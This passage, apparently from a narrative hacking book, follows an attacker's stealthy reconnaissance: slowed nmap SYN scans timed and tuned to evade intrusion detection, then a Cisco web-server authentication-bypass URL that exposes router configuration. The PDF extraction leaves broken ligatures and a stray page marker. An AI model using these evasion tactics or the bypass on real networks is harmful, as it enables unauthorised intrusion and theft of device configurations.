If you’re going to scan a target, you need to pick the right time of day to do it You must sider the possibility of detection seriously, especially since IDSs are getting better and better Although the night might be a good time to scan, since they would probably be running a skeleton shift in terms of NOC personnel, I fi gured that the day would be a better choice During the day, the volume of traffi c going to and from their site would help hide my scans
con-To start with, there was no point in doing a scan that pinged their hosts Some IDSs trigger on that kind of activity, even if it’s fairly low level And most networks, if they’re tight, will fi lter inbound ICMP echo requests So, I started off by doing what can be called a “blind scan.” This scan basically scans for some common ports using what is called a TCP SYN scan With this type of scan, nmap completes two out of three steps of the three-way handshake TCP uses
to establish a connection This tends to allow me to avoid being detected by IDSs if I’m also careful to slow down the scan
I prefer to use a SYN scan rather than a full-connect scan, because a connect scan will probably log the connection somewhere and may alert the network administrators that something suspi-cious is going on So, for these guys, I slowed the scan down and looked only for ports 20, 21, 22,
23, 25, 80, and 443 (I expected to fi nd 80 and 443, but I wanted to look for the others as well)
The initial scan went well I identifi ed six interesting hosts How do I defi ne interesting? Good
question Interesting means that there were multiple ports open on the host and that some
Hosts Discovered and Available Services
IP Address System Ports Open Operating
10.89.144.133 80 (WWW) Cisco device10.89.144.140 80 (WWW) Cisco device10.89.144.155 80 (WWW), 443 (SSL) Windows NT 4.010.89.144.154 22 (SSH) Unknown10.89.144.166 80 (WWW), 443 (SSL) Windows 200010.89.144.241 25 (SMTP) Sun
Trang 40Hide and Sneak CHAPTER 1 11
of them were running services that could provide an avenue into the network Some of these
hosts were running two services, although both services were tied to the same application—a
Web server They all appeared to be behind a router that was providing some fi ltering features
(looks like I guessed correctly), and they varied in their OS mixture I made a list of systems
and services I found (the IP addresses have been changed to protect the “innocent”)
I had this list, but now I needed to fi nd out some more information First off, the Cisco devices—what were they? Were they routers or switches? Since I had access to the Web servers
on these devices, that’s where I started
STUPID CISCO TRICKS
Cisco switches and routers had an interesting bug in their Web servers a while back This bug
allowed you to bypass the authentication in the Web server and gain access to selected
com-mands on the device It was really simple, and I was quite amazed that no one else ever had
fi gured it out before I saw it (hell, I even kicked myself for not thinking about it earlier) Anyway, the exploit goes like this: You send an URL like the following to the device: http://
IP-address/<xx>/exec/-/show/config, where <xx> is a number from 19 to 99 If the Cisco device is vulnerable, you see something like this:
Cisco Web Authentication Bypass Vulnerability
Very slick Now, I still wasn’t sure how I was going to access this device beyond the use of the
Web server, but I’d fi gure that out later But from what I saw on my screen now, this was defi
-nitely a router, and in particular, a Cisco router